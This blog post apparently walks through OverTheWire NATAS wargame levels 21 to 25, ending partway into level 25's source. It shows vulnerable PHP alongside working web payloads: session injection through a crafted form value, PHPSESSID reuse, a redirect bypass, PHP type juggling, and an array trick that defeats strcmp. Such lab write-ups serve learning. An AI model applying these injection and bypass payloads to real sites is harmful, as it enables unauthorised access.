<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="OverTheWire: NATAS 21 – 25" /><meta property="og:locale" content="en" /><meta name="description" content="LEVEL 21" /><meta property="og:description" content="LEVEL 21" /><link rel="canonical" href="https://megawattsec.com/posts/overthewire-natas-21/" /><meta property="og:url" content="https://megawattsec.com/posts/overthewire-natas-21/" /><meta property="og:site_name" content="MegaWattSec" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2019-09-16T14:49:55-04:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="OverTheWire: NATAS 21 – 25" /><meta name="twitter:site" content="@megawattsec" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2019-09-16T14:49:55-04:00","datePublished":"2019-09-16T14:49:55-04:00","description":"LEVEL 21","headline":"OverTheWire: NATAS 21 – 25","mainEntityOfPage":{"@type":"WebPage","@id":"https://megawattsec.com/posts/overthewire-natas-21/"},"url":"https://megawattsec.com/posts/overthewire-natas-21/"}</script><title>OverTheWire: NATAS 21 &#8211; 25 | MegaWattSec</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="MegaWattSec"><meta name="application-name" content="MegaWattSec"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/jamack_close.jpg " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">MegaWattSec</a></div><div class="site-subtitle font-italic">Adventures of a Forever-Newb</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/megawattsec" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/megawattsec" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['megawattsec','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>OverTheWire: NATAS 21 &#8211; 25</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>OverTheWire: NATAS 21 &#8211; 25</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/megawattsec">Dustin</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1568659795" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2019-09-16 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1694 words"> <em>9 min</em> read</span></div></div></div><div class="post-content"><h3 id="level-21"><span class="mr-2">LEVEL 21</span><a href="#level-21" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><img class="alignnone size-full wp-image-269" data-src="/assets/img/2019/09/2019-09-19_09h49_33.png" data-proofer-ignore></p><p>This level has a second site associated with it, where all the action is:</p><p><img class="alignnone size-full wp-image-270" data-src="/assets/img/2019/09/2019-09-19_09h50_09.png" data-proofer-ignore></p><h4 id="main-site"><span class="mr-2">Main Site</span><a href="#main-site" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><p>PHP sourcecode of the main page:</p><figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?</span>

<span class="k">function</span> <span class="n">print_credentials</span><span class="p">()</span> <span class="p">{</span> 
  <span class="k">if</span><span class="p">(</span><span class="nv">$_SESSION</span> <span class="k">and</span> <span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"admin"</span><span class="p">,</span> <span class="nv">$_SESSION</span><span class="p">)</span> <span class="k">and</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"admin"</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">print</span> <span class="s2">"You are an admin. The credentials for the next level are:&lt;br&gt;"</span><span class="p">;</span>
  <span class="k">print</span> <span class="s2">"&lt;pre&gt;Username: natas22</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
  <span class="k">print</span> <span class="s2">"Password: &lt;censored&gt;&lt;/pre&gt;"</span><span class="p">;</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
  <span class="k">print</span> <span class="s2">"You are logged in as a regular user. Login as an admin to retrieve credentials for natas22."</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="nb">session_start</span><span class="p">();</span>
<span class="nf">print_credentials</span><span class="p">();</span>

<span class="cp">?&gt;</span></code></pre></figure><p>The main site needs “admin” session variable set to 1 for us to get the next password.</p><h4 id="experimenter-site"><span class="mr-2">Experimenter Site</span><a href="#experimenter-site" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><p>The PHP sourcecode of the experimenter page:</p><figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?</span> 
<span class="nb">session_start</span><span class="p">();</span>

<span class="c1">// if update was submitted, store it</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"submit"</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
  <span class="k">foreach</span><span class="p">(</span><span class="nv">$_REQUEST</span> <span class="k">as</span> <span class="nv">$key</span> <span class="o">=&gt;</span> <span class="nv">$val</span><span class="p">)</span> <span class="p">{</span>
  <span class="nv">$_SESSION</span><span class="p">[</span><span class="nv">$key</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$val</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"debug"</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">))</span> <span class="p">{</span>
  <span class="k">print</span> <span class="s2">"[DEBUG] Session contents:&lt;br&gt;"</span><span class="p">;</span>
  <span class="nb">print_r</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// only allow these keys</span>
<span class="nv">$validkeys</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="s2">"align"</span> <span class="o">=&gt;</span> <span class="s2">"center"</span><span class="p">,</span> <span class="s2">"fontsize"</span> <span class="o">=&gt;</span> <span class="s2">"100%"</span><span class="p">,</span> <span class="s2">"bgcolor"</span> <span class="o">=&gt;</span> <span class="s2">"yellow"</span><span class="p">);</span>
<span class="nv">$form</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>

<span class="nv">$form</span> <span class="mf">.</span><span class="o">=</span> <span class="s1">'&lt;form action="index.php" method="POST"&gt;'</span><span class="p">;</span>
<span class="k">foreach</span><span class="p">(</span><span class="nv">$validkeys</span> <span class="k">as</span> <span class="nv">$key</span> <span class="o">=&gt;</span> <span class="nv">$defval</span><span class="p">)</span> <span class="p">{</span>
  <span class="nv">$val</span> <span class="o">=</span> <span class="nv">$defval</span><span class="p">;</span>
  <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="nv">$key</span><span class="p">,</span> <span class="nv">$_SESSION</span><span class="p">))</span> <span class="p">{</span>
  <span class="nv">$val</span> <span class="o">=</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="nv">$key</span><span class="p">];</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
  <span class="nv">$_SESSION</span><span class="p">[</span><span class="nv">$key</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$val</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="nv">$form</span> <span class="mf">.</span><span class="o">=</span> <span class="s2">"</span><span class="nv">$key</span><span class="s2">: &lt;input name='</span><span class="nv">$key</span><span class="s2">' value='</span><span class="nv">$val</span><span class="s2">' /&gt;&lt;br&gt;"</span><span class="p">;</span>
<span class="p">}</span>
<span class="nv">$form</span> <span class="mf">.</span><span class="o">=</span> <span class="s1">'&lt;input type="submit" name="submit" value="Update" /&gt;'</span><span class="p">;</span>
<span class="nv">$form</span> <span class="mf">.</span><span class="o">=</span> <span class="s1">'&lt;/form&gt;'</span><span class="p">;</span>

<span class="nv">$style</span> <span class="o">=</span> <span class="s2">"background-color: "</span><span class="mf">.</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"bgcolor"</span><span class="p">]</span><span class="mf">.</span><span class="s2">"; text-align: "</span><span class="mf">.</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"align"</span><span class="p">]</span><span class="mf">.</span><span class="s2">"; font-size: "</span><span class="mf">.</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"fontsize"</span><span class="p">]</span><span class="mf">.</span><span class="s2">";"</span><span class="p">;</span>
<span class="nv">$example</span> <span class="o">=</span> <span class="s2">"&lt;div style='</span><span class="nv">$style</span><span class="s2">'&gt;Hello world!&lt;/div&gt;"</span><span class="p">;</span>
<span class="cp">?&gt;</span>

<span class="nt">&lt;p&gt;</span>Example:<span class="nt">&lt;/p&gt;</span>
<span class="cp">&lt;?=</span><span class="nv">$example</span><span class="cp">?&gt;</span>

<span class="nt">&lt;p&gt;</span>Change example values here:<span class="nt">&lt;/p&gt;</span>
<span class="cp">&lt;?=</span><span class="nv">$form</span><span class="cp">?&gt;</span></code></pre></figure><p>The first thing I noticed on the experimenter site is the use of “DEBUG” variable again, so I immediately set it for future use. When looking at the requests in Burp, I noticed the request for the main site and the experimenter site have different PHPSESSION cookie values, so that may be a problem when we’re trying to set “admin=1” for the main site.</p><p>There’s a line in the source that sets some HTML with values we have control over, so maybe we can inject HTML.<br /> <code class="language-plaintext highlighter-rouge">$form .= “$key: &lt;input name=’$key’ value=’$val’ /&gt;”;</code></p><p>Tested an injection of <code class="language-plaintext highlighter-rouge">‘ /&gt;admin:&lt;input name=’admin’ value=’1</code> on the “bgcolor” value. Success with the injection!<br /> <img class="alignnone size-full wp-image-272" data-src="/assets/img/2019/09/2019-09-19_10h11_15.png" data-proofer-ignore></p><p>To use the debug flag while we submit the form, put it all in the address bar like <code class="language-plaintext highlighter-rouge">“/index.php?debug&amp;align=center&amp;fontsize=100%25&amp;bgcolor=yellow%27%20/%3E%3Cbr%3Eadmin:%3Cinput%20name=%27admin%27%20value=%271&amp;submit=Update”</code><br /> <img class="alignnone size-full wp-image-273" data-src="/assets/img/2019/09/2019-09-19_10h20_28.png" data-proofer-ignore></p><p>Looking at the page source for this is pretty revealing:</p><figure class="highlight"><pre><code class="language-html" data-lang="html"><span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;head&gt;&lt;link</span> <span class="na">rel=</span><span class="s">"stylesheet"</span> <span class="na">type=</span><span class="s">"text/css"</span> <span class="na">href=</span><span class="s">"http://www.overthewire.org/wargames/natas/level.css"</span><span class="nt">&gt;&lt;/head&gt;</span>
<span class="nt">&lt;body&gt;</span>
<span class="nt">&lt;h1&gt;</span>natas21 - CSS style experimenter<span class="nt">&lt;/h1&gt;</span>
<span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"content"</span><span class="nt">&gt;</span>
<span class="nt">&lt;p&gt;</span>
<span class="nt">&lt;b&gt;</span>Note: this website is colocated with <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"http://natas21.natas.labs.overthewire.org"</span><span class="nt">&gt;</span>http://natas21.natas.labs.overthewire.org<span class="nt">&lt;/a&gt;&lt;/b&gt;</span>
<span class="nt">&lt;/p&gt;</span>
[DEBUG] Session contents:<span class="nt">&lt;br&gt;</span>Array
(
  [align] =&gt; center
  [fontsize] =&gt; 100%
  [bgcolor] =&gt; yellow' /&gt;<span class="nt">&lt;br&gt;</span>admin:<span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">'admin'</span> <span class="na">value=</span><span class="s">'1
  [debug] =&gt; 
  [submit] =&gt; Update
)

&lt;p&gt;Example:&lt;/p&gt;
&lt;div style='</span><span class="na">background-color:</span> <span class="na">yellow</span><span class="err">'</span> <span class="nt">/&gt;&lt;br&gt;</span>admin:<span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">'admin'</span> <span class="na">value=</span><span class="s">'1; text-align: center; font-size: 100%;'</span><span class="nt">&gt;</span>Hello world!<span class="nt">&lt;/div&gt;</span>
<span class="nt">&lt;p&gt;</span>Change example values here:<span class="nt">&lt;/p&gt;</span>
<span class="nt">&lt;form</span> <span class="na">action=</span><span class="s">"index.php"</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span>align: <span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">'align'</span> <span class="na">value=</span><span class="s">'center'</span> <span class="nt">/&gt;&lt;br&gt;</span>fontsize: <span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">'fontsize'</span> <span class="na">value=</span><span class="s">'100%'</span> <span class="nt">/&gt;&lt;br&gt;</span>bgcolor: <span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">'bgcolor'</span> <span class="na">value=</span><span class="s">'yellow'</span> <span class="nt">/&gt;&lt;br&gt;</span>admin:<span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">'admin'</span> <span class="na">value=</span><span class="s">'1'</span> <span class="nt">/&gt;&lt;br&gt;&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">name=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"Update"</span> <span class="nt">/&gt;&lt;/form&gt;</span>
<span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"viewsource"</span><span class="nt">&gt;&lt;a</span> <span class="na">href=</span><span class="s">"index-source.html"</span><span class="nt">&gt;</span>View sourcecode<span class="nt">&lt;/a&gt;&lt;/div&gt;</span>
<span class="nt">&lt;/div&gt;</span>
<span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span></code></pre></figure><p>From looking at the debug output, it looks like can modify our injection to get placed into the session array instead of the HTML. It’s a little easier to do within Burp Repeater than it would be in the browser:</p><p><img class="alignnone wp-image-274 size-full" data-src="/assets/img/2019/09/2019-09-19_10h27_28.png" data-proofer-ignore><br /> Success! Notice how <code class="language-plaintext highlighter-rouge">"[admin] =&gt; 1"</code> is injected into the session array.</p><p>All we should have to do is then change the PHPSESSID of the main site to this one and reload. Just load the main site request into Repeater and change the PHPSESSID value, then Send… BUT IT DOESN’T WORK!!</p><p>Maybe we <em>DO</em> have to inject the value first into the HTML to set it into the Session Array.<br /> Since we have to interact with the ‘Update’ button on the page, use the browser for this part. Use the HTML injection from earlier for the “bgcolor” value, <code class="language-plaintext highlighter-rouge">yellow’ /&gt;admin:&lt;input name=’admin’ value=’1</code>, then press the ‘Update’ button. When you get the response, the HTML should be changed to include our admin value. Then press ‘Update’ once more to add the values into the Session Array.</p><p>Check that it worked by using the Burp Repeater again on the main site, don’t forget to change the PHPSESSID value to the experimenter site!</p><p><img class="alignnone wp-image-275 size-full" data-src="/assets/img/2019/09/2019-09-19_10h53_28.png" data-proofer-ignore></p><p>AWESOME! It worked!</p><p> </p><h3 id="level-22"><span class="mr-2">LEVEL 22</span><a href="#level-22" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p>This level is almost completely blank on the HTML, only a link to the sourcecode! Let’s see it…</p><figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?</span>
<span class="nb">session_start</span><span class="p">();</span>

<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"revelio"</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">))</span> <span class="p">{</span>
  <span class="c1">// only admins can reveal the password</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="nv">$_SESSION</span> <span class="k">and</span> <span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"admin"</span><span class="p">,</span> <span class="nv">$_SESSION</span><span class="p">)</span> <span class="k">and</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"admin"</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">))</span> <span class="p">{</span>
  <span class="nb">header</span><span class="p">(</span><span class="s2">"Location: /"</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>


<span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;head&gt;</span>
<span class="c">&lt;!-- This stuff in the header has nothing to do with the level --&gt;</span>
<span class="nt">&lt;link</span> <span class="na">rel=</span><span class="s">"stylesheet"</span> <span class="na">type=</span><span class="s">"text/css"</span> <span class="na">href=</span><span class="s">"http://natas.labs.overthewire.org/css/level.css"</span><span class="nt">&gt;</span>
<span class="nt">&lt;link</span> <span class="na">rel=</span><span class="s">"stylesheet"</span> <span class="na">href=</span><span class="s">"http://natas.labs.overthewire.org/css/jquery-ui.css"</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;link</span> <span class="na">rel=</span><span class="s">"stylesheet"</span> <span class="na">href=</span><span class="s">"http://natas.labs.overthewire.org/css/wechall.css"</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;script </span><span class="na">src=</span><span class="s">"http://natas.labs.overthewire.org/js/jquery-1.9.1.js"</span><span class="nt">&gt;&lt;/script&gt;</span>
<span class="nt">&lt;script </span><span class="na">src=</span><span class="s">"http://natas.labs.overthewire.org/js/jquery-ui.js"</span><span class="nt">&gt;&lt;/script&gt;</span>
<span class="nt">&lt;script </span><span class="na">src=</span><span class="s">http://natas.labs.overthewire.org/js/wechall-data.js</span><span class="nt">&gt;&lt;/script&gt;&lt;script </span><span class="na">src=</span><span class="s">"http://natas.labs.overthewire.org/js/wechall.js"</span><span class="nt">&gt;&lt;/script&gt;</span>
<span class="nt">&lt;script&gt;</span><span class="kd">var</span> <span class="nx">wechallinfo</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">level</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">natas22</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">pass</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">&lt;censored&gt;</span><span class="dl">"</span> <span class="p">};</span><span class="nt">&lt;/script&gt;&lt;/head&gt;</span>
<span class="nt">&lt;body&gt;</span>
<span class="nt">&lt;h1&gt;</span>natas22<span class="nt">&lt;/h1&gt;</span>
<span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"content"</span><span class="nt">&gt;</span>

<span class="cp">&lt;?</span>
  <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"revelio"</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">))</span> <span class="p">{</span>
  <span class="k">print</span> <span class="s2">"You are an admin. The credentials for the next level are:&lt;br&gt;"</span><span class="p">;</span>
  <span class="k">print</span> <span class="s2">"&lt;pre&gt;Username: natas23</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
  <span class="k">print</span> <span class="s2">"Password: &lt;censored&gt;&lt;/pre&gt;"</span><span class="p">;</span>
  <span class="p">}</span>
<span class="cp">?&gt;</span></code></pre></figure><p>This time it is checking for a variable <code class="language-plaintext highlighter-rouge">'revelio'</code>. And that’s ALL it’s checking for!! This level must be a Harry Potter joke.</p><p>Sure enough, that’s all it needed!<br /> <img class="alignnone wp-image-280 size-full" data-src="/assets/img/2019/09/2019-09-19_11h40_39.png" data-proofer-ignore></p><p>Doing this from the browser doesn’t get the same results though, because there’s a redirect, “Location: /”.</p><p> </p><h3 id="level-23"><span class="mr-2">LEVEL 23</span><a href="#level-23" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><img class="alignnone size-full wp-image-281" data-src="/assets/img/2019/09/2019-09-19_11h46_04.png" data-proofer-ignore></p><p>Here we only have a password entry form.</p><figure class="highlight"><pre><code class="language-php" data-lang="php">Password:
<span class="nt">&lt;form</span> <span class="na">name=</span><span class="s">"input"</span> <span class="na">method=</span><span class="s">"get"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"passwd"</span> <span class="na">size=</span><span class="s">20</span><span class="nt">&gt;</span>
    <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"Login"</span><span class="nt">&gt;</span>
<span class="nt">&lt;/form&gt;</span>

<span class="cp">&lt;?php</span>
  <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"passwd"</span><span class="p">,</span><span class="nv">$_REQUEST</span><span class="p">)){</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">strstr</span><span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"passwd"</span><span class="p">],</span><span class="s2">"iloveyou"</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"passwd"</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mi">10</span> <span class="p">)){</span>
      <span class="k">echo</span> <span class="s2">"&lt;br&gt;The credentials for the next level are:&lt;br&gt;"</span><span class="p">;</span>
      <span class="k">echo</span> <span class="s2">"&lt;pre&gt;Username: natas24 Password: &lt;censored&gt;&lt;/pre&gt;"</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">else</span><span class="p">{</span>
      <span class="k">echo</span> <span class="s2">"&lt;br&gt;Wrong!&lt;br&gt;"</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span>
  <span class="c1">// morla / 10111</span>
<span class="cp">?&gt;</span></code></pre></figure><p>Looks like the function strstr() is being used to search a variable ‘passwd’ for the phrase “iloveyou”. The only other check is that ‘passwd’ equals a number greater than 10. So there is a check for a number, and a check for a string. It appears that putting a mathematical operator in the second check must force it to treat the string as a number, dropping off the invalid non-numerical characters. Because “11iloveyou” works!!</p><p><img class="alignnone size-full wp-image-282" data-src="/assets/img/2019/09/2019-09-19_11h57_55.png" data-proofer-ignore></p><p> </p><h3 id="level-24"><span class="mr-2">LEVEL 24</span><a href="#level-24" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p>This is another password input form just like the last level. Here is the sourcecode for this one:</p><figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span>
  <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"passwd"</span><span class="p">,</span><span class="nv">$_REQUEST</span><span class="p">)){</span>
    <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">strcmp</span><span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"passwd"</span><span class="p">],</span><span class="s2">"&lt;censored&gt;"</span><span class="p">)){</span>
      <span class="k">echo</span> <span class="s2">"&lt;br&gt;The credentials for the next level are:&lt;br&gt;"</span><span class="p">;</span>
      <span class="k">echo</span> <span class="s2">"&lt;pre&gt;Username: natas25 Password: &lt;censored&gt;&lt;/pre&gt;"</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">else</span><span class="p">{</span>
      <span class="k">echo</span> <span class="s2">"&lt;br&gt;Wrong!&lt;br&gt;"</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span>
  <span class="c1">// morla / 10111</span>
<span class="cp">?&gt;</span></code></pre></figure><p>This password check is using strcmp() this time. Go straight to the <a href="https://www.php.net/manual/en/function.strcmp.php">manual page</a> to see if there’s anything interesting about it. The first thing that catches my eye is the return values.</p><blockquote><p>“Returns &lt; 0 if str1 is less than str2; &gt; 0 if str1 is greater than str2, and 0 if they are equal. ”</p></blockquote><p>This is used in a boolean check, so “0” means False. There is a NOT operator on the strcmp(), so that would mean a “0” result means True now. The way to get the intended result is if the strings are equal. We’re probably not going to just guess the password, so maybe there is something else we can exploit in the return values.</p><p>One of the comments on the manual page is interesting:</p><blockquote><p><code class="language-plaintext highlighter-rouge">&lt;span class="html"&gt;strcmp() will return NULL on failure.&lt;/span&gt;</code></p><p>This has the side effect of equating to a match when using an equals comparison (==).<br /> Instead, you may wish to test matches using the identical comparison (===), which should not catch a NULL return.</p><p>———————<br /> Example<br /> ———————</p><p>$variable1 = array();<br /> $ans === strcmp($variable1, $variable2);</p><p>This will stop $ans from returning a match;</p><p>Please use strcmp() carefully when comparing user input, as this may have potential security implications in your code.</p></blockquote><p>Getting it to return NULL might give us a useful side effect. In the example in the comment, the variable is assigned an array to get a failure. So to force the ‘passwd’ variable to an array, put in <code class="language-plaintext highlighter-rouge">/?passwd[]=something</code> for the query. That returns an error message and success!</p><p><img class="alignnone size-full wp-image-284" data-src="/assets/img/2019/09/2019-09-19_12h29_45.png" data-proofer-ignore></p><p> </p><h3 id="level-25"><span class="mr-2">LEVEL 25</span><a href="#level-25" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p>This level starts out with a block of text that gets replaced when you change the language setting.</p><p><img class="alignnone size-full wp-image-287" data-src="/assets/img/2019/09/2019-09-19_12h47_46.png" data-proofer-ignore></p><p>Sourcecode:</p><figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span>
  <span class="c1">// cheers and &lt;3 to malvina</span>
  <span class="c1">// - morla</span>

  <span class="k">function</span> <span class="n">setLanguage</span><span class="p">(){</span>
    <span class="cm">/* language setup */</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"lang"</span><span class="p">,</span><span class="nv">$_REQUEST</span><span class="p">))</span>
      <span class="k">if</span><span class="p">(</span><span class="nf">safeinclude</span><span class="p">(</span><span class="s2">"language/"</span> <span class="mf">.</span> <span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"lang"</span><span class="p">]</span> <span class="p">))</span>
        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
    <span class="nf">safeinclude</span><span class="p">(</span><span class="s2">"language/en"</span><span class="p">);</span> 
  <span class="p">}</span>
  
  <span class="k">function</span> <span class="n">safeinclude</span><span class="p">(</span><span class="nv">$filename</span><span class="p">){</span>
    <span class="c1">// check for directory traversal</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">strstr</span><span class="p">(</span><span class="nv">$filename</span><span class="p">,</span><span class="s2">"../"</span><span class="p">)){</span>
